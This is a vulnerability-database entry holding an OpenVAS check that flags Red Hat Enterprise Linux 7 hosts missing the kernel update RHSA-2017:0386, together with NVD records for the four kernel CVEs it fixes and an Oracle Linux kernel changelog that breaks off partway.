ID OPENVAS:1361412562310871768 Type openvas Reporter Copyright (C) 2017 Greenbone Networks GmbH Modified 2018-11-16T00:00:00
Description
The remote host is missing an update for the
###############################################################################
# OpenVAS Vulnerability Test
#
# RedHat Update for kernel RHSA-2017:0386-01
#
# Authors:
# System Generated Check
#
# Copyright:
# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################
if(description)
{
script_oid("1.3.6.1.4.1.25623.1.0.871768");
script_version("$Revision: 12380 $");
script_tag(name:"last_modification", value:"$Date: 2018-11-16 12:03:48 +0100 (Fri, 16 Nov 2018) $");
script_tag(name:"creation_date", value:"2017-03-03 05:49:38 +0100 (Fri, 03 Mar 2017)");
script_cve_id("CVE-2016-8630", "CVE-2016-8655", "CVE-2016-9083", "CVE-2016-9084");
script_tag(name:"cvss_base", value:"7.2");
script_tag(name:"cvss_base_vector", value:"AV:L/AC:L/Au:N/C:C/I:C/A:C");
script_tag(name:"qod_type", value:"package");
script_name("RedHat Update for kernel RHSA-2017:0386-01");
script_tag(name:"summary", value:"The remote host is missing an update for the 'kernel'
package(s) announced via the referenced advisory.");
script_tag(name:"vuldetect", value:"Checks if a vulnerable version is present on the target host.");
script_tag(name:"insight", value:"The kernel packages contain the Linux
kernel, the core of any Linux operating system.
Security Fix(es):
* Linux kernel built with the Kernel-based Virtual Machine (CONFIG_KVM)
support is vulnerable to a null pointer dereference flaw. It could occur on
x86 platform, when emulating an undefined instruction. An attacker could
use this flaw to crash the host kernel resulting in DoS. (CVE-2016-8630,
Important)
* A race condition issue leading to a use-after-free flaw was found in the
way the raw packet sockets implementation in the Linux kernel networking
subsystem handled synchronization while creating the TPACKET_V3 ring
buffer. A local user able to open a raw packet socket (requires the
CAP_NET_RAW capability) could use this flaw to elevate their privileges on
the system. (CVE-2016-8655, Important)
* A flaw was discovered in the Linux kernel's implementation of VFIO. An
attacker issuing an ioctl can create a situation where memory is corrupted
and modify memory outside of the expected area. This may overwrite kernel
memory and subvert kernel execution. (CVE-2016-9083, Important)
* The use of a kzalloc with an integer multiplication allowed an integer
overflow condition to be reached in vfio_pci_intrs.c. This combined with
CVE-2016-9083 may allow an attacker to craft an attack and use unallocated
memory, potentially crashing the machine. (CVE-2016-9084, Moderate)
Red Hat would like to thank Philip Pettersson for reporting CVE-2016-8655.
Additional Changes:
Space precludes documenting all of the bug fixes and enhancements included
in this advisory. To see the complete list of bug fixes and enhancements,
refer to the linked KnowledgeBase article.");
script_xref(name:"URL", value:"https://access.redhat.com/articles/2940041");
script_tag(name:"affected", value:"kernel on
Red Hat Enterprise Linux Server (v. 7)");
script_tag(name:"solution", value:"Please Install the Updated Packages.");
script_xref(name:"RHSA", value:"2017:0386-01");
script_xref(name:"URL", value:"https://www.redhat.com/archives/rhsa-announce/2017-March/msg00008.html");
script_tag(name:"solution_type", value:"VendorFix");
script_category(ACT_GATHER_INFO);
script_copyright("Copyright (C) 2017 Greenbone Networks GmbH");
script_family("Red Hat Local Security Checks");
script_dependencies("gather-package-list.nasl");
script_mandatory_keys("ssh/login/rhel", "ssh/login/rpms", re:"ssh/login/release=RHENT_7");
exit(0);
}
include("revisions-lib.inc");
include("pkg-lib-rpm.inc");
release = rpm_get_ssh_release();
if(!release) exit(0);
res = "";
if(release == "RHENT_7")
{
if ((res = isrpmvuln(pkg:"kernel-abi-whitelists", rpm:"kernel-abi-whitelists~3.10.0~514.10.2.el7", rls:"RHENT_7")) != NULL)
{
security_message(data:res);
exit(0);
}
if ((res = isrpmvuln(pkg:"kernel-doc", rpm:"kernel-doc~3.10.0~514.10.2.el7", rls:"RHENT_7")) != NULL)
{
security_message(data:res);
exit(0);
}
if ((res = isrpmvuln(pkg:"kernel", rpm:"kernel~3.10.0~514.10.2.el7", rls:"RHENT_7")) != NULL)
{
security_message(data:res);
exit(0);
}
if ((res = isrpmvuln(pkg:"kernel-debug", rpm:"kernel-debug~3.10.0~514.10.2.el7", rls:"RHENT_7")) != NULL)
{
security_message(data:res);
exit(0);
}
if ((res = isrpmvuln(pkg:"kernel-debug-debuginfo", rpm:"kernel-debug-debuginfo~3.10.0~514.10.2.el7", rls:"RHENT_7")) != NULL)
{
security_message(data:res);
exit(0);
}
if ((res = isrpmvuln(pkg:"kernel-debug-devel", rpm:"kernel-debug-devel~3.10.0~514.10.2.el7", rls:"RHENT_7")) != NULL)
{
security_message(data:res);
exit(0);
}
if ((res = isrpmvuln(pkg:"kernel-debuginfo", rpm:"kernel-debuginfo~3.10.0~514.10.2.el7", rls:"RHENT_7")) != NULL)
{
security_message(data:res);
exit(0);
}
if ((res = isrpmvuln(pkg:"kernel-debuginfo-common-x86_64", rpm:"kernel-debuginfo-common-x86_64~3.10.0~514.10.2.el7", rls:"RHENT_7")) != NULL)
{
security_message(data:res);
exit(0);
}
if ((res = isrpmvuln(pkg:"kernel-devel", rpm:"kernel-devel~3.10.0~514.10.2.el7", rls:"RHENT_7")) != NULL)
{
security_message(data:res);
exit(0);
}
if ((res = isrpmvuln(pkg:"kernel-headers", rpm:"kernel-headers~3.10.0~514.10.2.el7", rls:"RHENT_7")) != NULL)
{
security_message(data:res);
exit(0);
}
if ((res = isrpmvuln(pkg:"kernel-tools", rpm:"kernel-tools~3.10.0~514.10.2.el7", rls:"RHENT_7")) != NULL)
{
security_message(data:res);
exit(0);
}
if ((res = isrpmvuln(pkg:"kernel-tools-debuginfo", rpm:"kernel-tools-debuginfo~3.10.0~514.10.2.el7", rls:"RHENT_7")) != NULL)
{
security_message(data:res);
exit(0);
}
if ((res = isrpmvuln(pkg:"kernel-tools-libs", rpm:"kernel-tools-libs~3.10.0~514.10.2.el7", rls:"RHENT_7")) != NULL)
{
security_message(data:res);
exit(0);
}
if ((res = isrpmvuln(pkg:"perf", rpm:"perf~3.10.0~514.10.2.el7", rls:"RHENT_7")) != NULL)
{
security_message(data:res);
exit(0);
}
if ((res = isrpmvuln(pkg:"perf-debuginfo", rpm:"perf-debuginfo~3.10.0~514.10.2.el7", rls:"RHENT_7")) != NULL)
{
security_message(data:res);
exit(0);
}
if ((res = isrpmvuln(pkg:"python-perf", rpm:"python-perf~3.10.0~514.10.2.el7", rls:"RHENT_7")) != NULL)
{
security_message(data:res);
exit(0);
}
if ((res = isrpmvuln(pkg:"python-perf-debuginfo", rpm:"python-perf-debuginfo~3.10.0~514.10.2.el7", rls:"RHENT_7")) != NULL)
{
security_message(data:res);
exit(0);
}
if (__pkg_match) exit(99);
exit(0);
}
{"id": "OPENVAS:1361412562310871768", "type": "openvas", "bulletinFamily": "scanner", "title": "RedHat Update for kernel RHSA-2017:0386-01", "description": "The remote host is missing an update for the ", "published": "2017-03-03T00:00:00", "modified": "2018-11-16T00:00:00", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310871768", "reporter": "Copyright (C) 2017 Greenbone Networks GmbH", "references": ["2017:0386-01", "https://www.redhat.com/archives/rhsa-announce/2017-March/msg00008.html", "https://access.redhat.com/articles/2940041"], "cvelist": ["CVE-2016-8655", "CVE-2016-9084", "CVE-2016-8630", "CVE-2016-9083"], "lastseen": "2019-05-29T18:33:54", "viewCount": 2, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2016-9083", "CVE-2016-9084", "CVE-2016-8630", "CVE-2016-8655"]}, {"type": "nessus", "idList": ["CENTOS_RHSA-2017-0386.NASL", "FEDORA_2016-EE3A114958.NASL", "ORACLELINUX_ELSA-2017-0386.NASL", "REDHAT-RHSA-2017-0386.NASL", "VIRTUOZZO_VZLSA-2017-0386.NASL", "FEDORA_2016-96D276367E.NASL", "ALA_ALAS-2016-772.NASL", "SL_20170302_KERNEL_ON_SL7_X.NASL", "ORACLELINUX_ELSA-2017-3514.NASL", "REDHAT-RHSA-2017-0387.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310851449", "OPENVAS:1361412562310871927", "OPENVAS:1361412562310842986", "OPENVAS:1361412562310842981", "OPENVAS:1361412562310842980", "OPENVAS:1361412562310810170", "OPENVAS:1361412562310810159", "OPENVAS:1361412562310882673", "OPENVAS:1361412562310810127", "OPENVAS:1361412562310842987"]}, {"type": "centos", "idList": ["CESA-2017:0386"]}, {"type": "oraclelinux", "idList": ["ELSA-2017-0386-1", "ELSA-2017-3514", "ELSA-2017-0386"]}, {"type": "redhat", "idList": ["RHSA-2017:0387", "RHSA-2017:0402", "RHSA-2017:0386"]}, {"type": "f5", "idList": ["F5:K38472857"]}, {"type": "fedora", "idList": ["FEDORA:D89B960F8CA9", "FEDORA:8EB6260D0217", "FEDORA:3D4286087E43", "FEDORA:E2FD36125E3E"]}, {"type": "seebug", "idList": ["SSV:92567"]}, {"type": "amazon", "idList": ["ALAS-2016-772"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2016:3050-1", "OPENSUSE-SU-2016:3058-1"]}, {"type": "ubuntu", "idList": ["USN-3151-3", "USN-3151-4", "USN-3150-1", "USN-3152-1", "USN-3151-1", "USN-3152-2", "USN-3149-1", "USN-3151-2", "USN-3150-2", "USN-3149-2"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:D5BBB161063632A8D15C357D43E97C75"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/LINUX/LOCAL/AF_PACKET_CHOCOBO_ROOT_PRIV_ESC", "MSF:EXPLOIT/LINUX/LOCAL/AF_PACKET_CHOCOBO_ROOT_PRIV_ESC/"]}, {"type": "zdt", "idList": ["1337DAY-ID-26493", "1337DAY-ID-30429", "1337DAY-ID-33037"]}, {"type": "myhack58", "idList": ["MYHACK58:62201682103"]}, {"type": "archlinux", "idList": ["ASA-201612-5", "ASA-201612-7", "ASA-201612-8", "ASA-201612-6"]}, {"type": "threatpost", "idList": ["THREATPOST:71B135B09C0B20493E1A02875B015BA4"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:147727"]}, {"type": "slackware", "idList": ["SSA-2016-347-01"]}, {"type": "exploitdb", "idList": ["EDB-ID:47170", "EDB-ID:40871", "EDB-ID:44696"]}, {"type": "thn", "idList": ["THN:04F5FC12455795F06BC21F5C803FA77E"]}], "modified": "2019-05-29T18:33:54", "rev": 2}, "score": {"value": 7.9, "vector": "NONE", "modified": "2019-05-29T18:33:54", "rev": 2}, "vulnersScore": 7.9}, "pluginID": "1361412562310871768", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for kernel RHSA-2017:0386-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.871768\");\n script_version(\"$Revision: 12380 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-16 12:03:48 +0100 (Fri, 16 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-03-03 05:49:38 +0100 (Fri, 03 Mar 2017)\");\n script_cve_id(\"CVE-2016-8630\", \"CVE-2016-8655\", \"CVE-2016-9083\", \"CVE-2016-9084\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"RedHat Update for kernel RHSA-2017:0386-01\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'kernel'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"The kernel packages contain the Linux\nkernel, the core of any Linux operating system.\n\nSecurity Fix(es):\n\n * Linux kernel built with the Kernel-based Virtual Machine (CONFIG_KVM)\nsupport is vulnerable to a null pointer dereference flaw. It could occur on\nx86 platform, when emulating an undefined instruction. An attacker could\nuse this flaw to crash the host kernel resulting in DoS. (CVE-2016-8630,\nImportant)\n\n * A race condition issue leading to a use-after-free flaw was found in the\nway the raw packet sockets implementation in the Linux kernel networking\nsubsystem handled synchronization while creating the TPACKET_V3 ring\nbuffer. A local user able to open a raw packet socket (requires the\nCAP_NET_RAW capability) could use this flaw to elevate their privileges on\nthe system. (CVE-2016-8655, Important)\n\n * A flaw was discovered in the Linux kernel's implementation of VFIO. An\nattacker issuing an ioctl can create a situation where memory is corrupted\nand modify memory outside of the expected area. This may overwrite kernel\nmemory and subvert kernel execution. (CVE-2016-9083, Important)\n\n * The use of a kzalloc with an integer multiplication allowed an integer\noverflow condition to be reached in vfio_pci_intrs.c. This combined with\nCVE-2016-9083 may allow an attacker to craft an attack and use unallocated\nmemory, potentially crashing the machine. (CVE-2016-9084, Moderate)\n\nRed Hat would like to thank Philip Pettersson for reporting CVE-2016-8655.\n\nAdditional Changes:\n\nSpace precludes documenting all of the bug fixes and enhancements included\nin this advisory. To see the complete list of bug fixes and enhancements,\nrefer to the linked KnowledgeBase article.\");\n\n script_xref(name:\"URL\", value:\"https://access.redhat.com/articles/2940041\");\n\n script_tag(name:\"affected\", value:\"kernel on\n Red Hat Enterprise Linux Server (v. 7)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"RHSA\", value:\"2017:0386-01\");\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2017-March/msg00008.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_7\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_7\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel-abi-whitelists\", rpm:\"kernel-abi-whitelists~3.10.0~514.10.2.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~3.10.0~514.10.2.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~3.10.0~514.10.2.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~3.10.0~514.10.2.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-debuginfo\", rpm:\"kernel-debug-debuginfo~3.10.0~514.10.2.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~3.10.0~514.10.2.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debuginfo\", rpm:\"kernel-debuginfo~3.10.0~514.10.2.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debuginfo-common-x86_64\", rpm:\"kernel-debuginfo-common-x86_64~3.10.0~514.10.2.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~3.10.0~514.10.2.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~3.10.0~514.10.2.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-tools\", rpm:\"kernel-tools~3.10.0~514.10.2.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-tools-debuginfo\", rpm:\"kernel-tools-debuginfo~3.10.0~514.10.2.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-tools-libs\", rpm:\"kernel-tools-libs~3.10.0~514.10.2.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perf\", rpm:\"perf~3.10.0~514.10.2.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perf-debuginfo\", rpm:\"perf-debuginfo~3.10.0~514.10.2.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"python-perf\", rpm:\"python-perf~3.10.0~514.10.2.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"python-perf-debuginfo\", rpm:\"python-perf-debuginfo~3.10.0~514.10.2.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "naslFamily": "Red Hat Local Security Checks"}
{"cve": [{"lastseen": "2020-12-09T20:07:44", "description": "drivers/vfio/pci/vfio_pci.c in the Linux kernel through 4.8.11 allows local users to bypass integer overflow checks, and cause a denial of service (memory corruption) or have unspecified other impact, by leveraging access to a vfio PCI device file for a VFIO_DEVICE_SET_IRQS ioctl call, aka a \"state machine confusion bug.\"", "edition": 5, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-11-28T03:59:00", "title": "CVE-2016-9083", "type": "cve", "cwe": ["CWE-119", "CWE-190"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9083"], "modified": "2018-01-05T02:31:00", "cpe": ["cpe:/o:linux:linux_kernel:4.8.11"], "id": "CVE-2016-9083", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-9083", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:linux:linux_kernel:4.8.11:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T20:07:44", "description": "drivers/vfio/pci/vfio_pci_intrs.c in the Linux kernel through 4.8.11 misuses the kzalloc function, which allows local users to cause a denial of service (integer overflow) or have unspecified other impact by leveraging access to a vfio PCI device file.", "edition": 5, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-11-28T03:59:00", "title": "CVE-2016-9084", "type": "cve", "cwe": ["CWE-190"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9084"], "modified": "2018-01-05T02:31:00", "cpe": ["cpe:/o:linux:linux_kernel:4.8.11"], "id": "CVE-2016-9084", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-9084", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:linux:linux_kernel:4.8.11:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T20:07:43", "description": "The x86_decode_insn function in arch/x86/kvm/emulate.c in the Linux kernel before 4.8.7, when KVM is enabled, allows local users to cause a denial of service (host OS crash) via a certain use of a ModR/M byte in an undefined instruction.", "edition": 5, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 5.5, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2016-11-28T03:59:00", "title": "CVE-2016-8630", "type": "cve", "cwe": ["CWE-284", "CWE-476"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 4.9, "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-8630"], "modified": "2018-01-05T02:31:00", "cpe": ["cpe:/o:linux:linux_kernel:4.8.6"], "id": "CVE-2016-8630", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-8630", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}, "cpe23": ["cpe:2.3:o:linux:linux_kernel:4.8.6:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T20:07:43", "description": "Race condition in net/packet/af_packet.c in the Linux kernel through 4.8.12 allows local users to gain privileges or cause a denial of service (use-after-free) by leveraging the CAP_NET_RAW capability to change a socket version, related to the packet_set_ring and packet_setsockopt functions.", "edition": 5, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-12-08T08:59:00", "title": "CVE-2016-8655", "type": "cve", "cwe": ["CWE-362", "CWE-416"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-8655"], "modified": "2018-05-25T01:29:00", "cpe": ["cpe:/o:linux:linux_kernel:4.8.12"], "id": "CVE-2016-8655", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-8655", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:linux:linux_kernel:4.8.12:*:*:*:*:*:*:*"]}], "oraclelinux": [{"lastseen": "2020-12-30T19:17:58", "bulletinFamily": "unix", "cvelist": ["CVE-2016-8655", "CVE-2016-9084", "CVE-2016-8630", "CVE-2016-9083"], "description": "- [3.10.0-514.6.10.0.1.el7]\n- [ipc] ipc/sem.c: bugfix for semctl(,,GETZCNT) (Manfred Spraul) [orabug 22552377]\n- Oracle Linux certificates (Alexey Petrenko)\n- Oracle Linux RHCK Module Signing Key was compiled into kernel (olkmod_signing_key.x509)(alexey.petrenko@oracle.com)\n- Update x509.genkey [bug 24817676]", "edition": 6, "modified": "2017-03-03T00:00:00", "published": "2017-03-03T00:00:00", "id": "ELSA-2017-0386-1", "href": "http://linux.oracle.com/errata/ELSA-2017-0386-1.html", "title": "kernel security, bug fix, and enhancement update", "type": "oraclelinux", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:37:41", "bulletinFamily": "unix", "cvelist": ["CVE-2016-8655", "CVE-2016-9084", "CVE-2016-8630", "CVE-2016-9083"], "description": "- [3.10.0-514.10.2.OL7]\n- Oracle Linux certificates (Alexey Petrenko)\n- Oracle Linux RHCK Module Signing Key was compiled into kernel (olkmod_signing_key.x509)(alexey.petrenko@oracle.com)\n- Update x509.genkey [bug 24817676]\n[3.10.0-514.10.2]\n- [net] dccp: fix freeing skb too early for IPV6_RECVPKTINFO (Hannes Frederic Sowa) [1423462 1423463]\n[3.10.0-514.10.1]\n- [block] blk-mq: Fix NULL pointer updating nr_requests (David Milburn) [1416133 1384066]\n- [scsi] cxlflash: Fix crash in cxlflash_restore_luntable() (Gustavo Duarte) [1415146 1400524]\n- [scsi] cxlflash: Improve context_reset() logic (Gustavo Duarte) [1415146 1400524]\n- [scsi] cxlflash: Avoid command room violation (Gustavo Duarte) [1415146 1400524]\n- [x86] Mark Kaby Lake with Kaby Lake PCH as supported (David Arcari) [1415094 1391219]\n- [scsi] be2iscsi: Add checks to validate completions (Maurizio Lombardi) [1414687 1324918]\n- [scsi] be2iscsi: Fix bad WRB index error (Maurizio Lombardi) [1414687 1324918]\n- [scsi] be2iscsi: Add lock to protect WRB alloc and free (Maurizio Lombardi) [1414687 1324918]\n- [mm] meminit: initialise more memory for inode/dentry hash tables in early boot (Yasuaki Ishimatsu) [1413623 1404584]\n- [s390] mem_detect: Revert 'add DAT sanity check' (Hendrik Brueckner) [1413600 1391540]\n- [cpufreq] intel_pstate: Fix code ordering in intel_pstate_set_policy() (Prarit Bhargava) [1411818 1398072]\n- [scsi] cxlflash: Improve EEH recovery time (Steve Best) [1402442 1397588]\n- [scsi] cxlflash: Fix to avoid EEH and host reset collisions (Steve Best) [1402442 1397588]\n- [scsi] cxlflash: Remove the device cleanly in the system shutdown path (Steve Best) [1402442 1397588]\n- [scsi] cxlflash: Scan host only after the port is ready for I/O (Steve Best) [1402442 1397588]\n- [x86] kvm: x86: Check memopp before dereference (Mateusz Guzik) [1395805 1395806] {CVE-2016-8630}\n- [vfio] pci: Fix integer overflows, bitmask check (Mateusz Guzik) [1394627 1394991 1394628 1394992] {CVE-2016-9083 CVE-2016-9084}\n- [acpi] acpi / scan: use platform bus type by default for _HID enumeration (Tony Camuso) [1393727 1383505]\n- [acpi] acpi / scan: introduce platform_id device PNP type flag (Tony Camuso) [1393727 1383505]\n- [char] ipmi: Convert the IPMI SI ACPI handling to a platform device (Tony Camuso) [1393727 1383505]\n- [acpi] acpi / ipmi: Cleanup coding styles (David Arcari) [1393725 1373703]\n- [acpi] acpi / ipmi: Cleanup some inclusion codes (David Arcari) [1393725 1373703]\n- [acpi] acpi / ipmi: Cleanup some initialization codes (David Arcari) [1393725 